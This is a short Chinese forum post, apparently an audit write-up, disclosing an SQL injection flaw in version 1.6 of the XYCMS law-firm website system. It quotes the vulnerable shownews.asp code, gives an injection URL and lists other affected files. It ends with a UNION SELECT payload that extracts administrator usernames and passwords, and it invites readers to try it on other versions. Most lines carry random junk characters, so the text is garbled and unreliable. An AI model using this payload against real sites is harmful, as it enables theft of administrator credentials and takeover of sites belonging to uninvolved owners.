前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似' ^; \$ t- U+ V" r0 D. C+ C
2 L. |' o, l5 n. ~
淫荡分割线/ K" d# ]% `" a" q0 {
-------------------------------------------------------- r3 J1 G. ^9 f2 R$ V! ]
+ [! q: z5 w _/ D
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)1 ]& P/ Z0 L' O2 ~
源码地址:http://down.chinaz.com/soft/29233.htm
* f) ]" U: {/ @7 R- B- n # z @# c6 Z- W6 l' \
漏洞文件:shownews.asp9 U( Z- T" p# T9 ]: K j8 `
漏洞代码:7-13行5 g& W* H# k: ~/ e3 C
% X5 s9 L+ @6 D2 q5 d8 G& A
8 X3 g L/ h0 U4 p" k# e" \<% n' B/ M3 @7 h) L6 Y
id=request.QueryString("id")
U9 q3 x% |1 Q4 x; [, T& k
- L- ^% |" X; k; rset snews=server.createobject("adodb.recordset") - c# _8 s. r0 w0 B3 p1 J, ~
exec="select * from [news] where id="&id$ [; v% X, t" ]
snews.open exec,conn,1,15 I& A" e. A9 D# o
%>0 Q* j8 m2 l3 C) u0 a
4 f; C( \; R) h . @3 Q& R* f8 c6 X; f2 U; j
什么过滤都没有 直造成注入% y" Z; @/ r4 q5 Z, i M
+ O: c) i" C, s( x( x* J注入点:http://127.0.0.1:99/shownews.asp?id=xx0 g5 [: L k) \7 _& `
0 g% a9 j( f1 a& m# h其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
" q. s7 k4 Q4 E" q% X, h9 Q# s
$ e. l" q( M' k. y) ^
" C L7 [3 ^6 W3 }; l* Kexp: union select 1,admin,password,4,5,7 from admin_user
8 a( J* D0 K) ]% H X# [1 I; h( f. ~5 W3 V; m. I1 w: y2 x
|